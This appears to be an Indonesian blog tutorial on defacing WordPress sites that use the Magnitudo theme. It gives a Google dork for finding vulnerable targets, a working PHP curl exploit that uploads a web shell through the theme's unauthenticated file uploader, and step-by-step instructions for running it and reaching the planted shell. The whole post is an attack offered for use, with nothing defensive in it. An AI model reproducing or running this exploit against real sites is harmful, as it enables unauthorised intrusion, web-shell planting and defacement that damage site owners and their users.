Google Dork :inurl:wp-content/themes/magnitudo
Use your brain untuk menemukan dork lainnya :)Exploit :
<?php$uploadfile="shell.php";$ch= curl_init("http://site.com/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult= curl_exec($ch);curl_close($ch);"$postResult";?>
Pertama download XAMMP nya HERE HERE
Jika Sudah , Cari File php.ini di System[C] -> Xammp -> Php -> Php.ini
Lalu tekan Control F dan ketikkan "curl" tanpa tanda kutip , lalu jika ketemu kamu hapus tandan ( ; ) , Lalu save ..
Oke , sekarang kamu Copy Exploitnya dan save dengan extensi .php
Simpan di folder xammp -> xammp -> PHP
Kedua , kamu copy shell kamu ke Folder xammp -> xammp -> PHP
Misalkan nama shell anda x.php ganti shell php yang ada di exploit tadi
$uploadfile="shell.php"; kamu rename dengan nama shell kamu tadi jika namanya x.php kamu rename menjadi x.php juga :))
Oke sekarang langsung saja , Pertama kita cari target dengan GOOGLE DORK tadi
Ex : http:/www.site.com/
Lalu tambahkan dengan exploitnya
/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php
Jika Ada Error Files Upload berarti itu vuln .
Buka exploitnya kamu copy semuanya ke exploit tadi
Lalu buka CMD ,
Ketikkan cd xammp enter >> cd php enter
Jika succes , filenya akan berada disini
http://site.com/wordpress/wp-content/uploads/2013/10/x.php
0 Response to " Tutorial Deface Magnitudo theme Arbitrary File Upload Vulnerability "
Post a Comment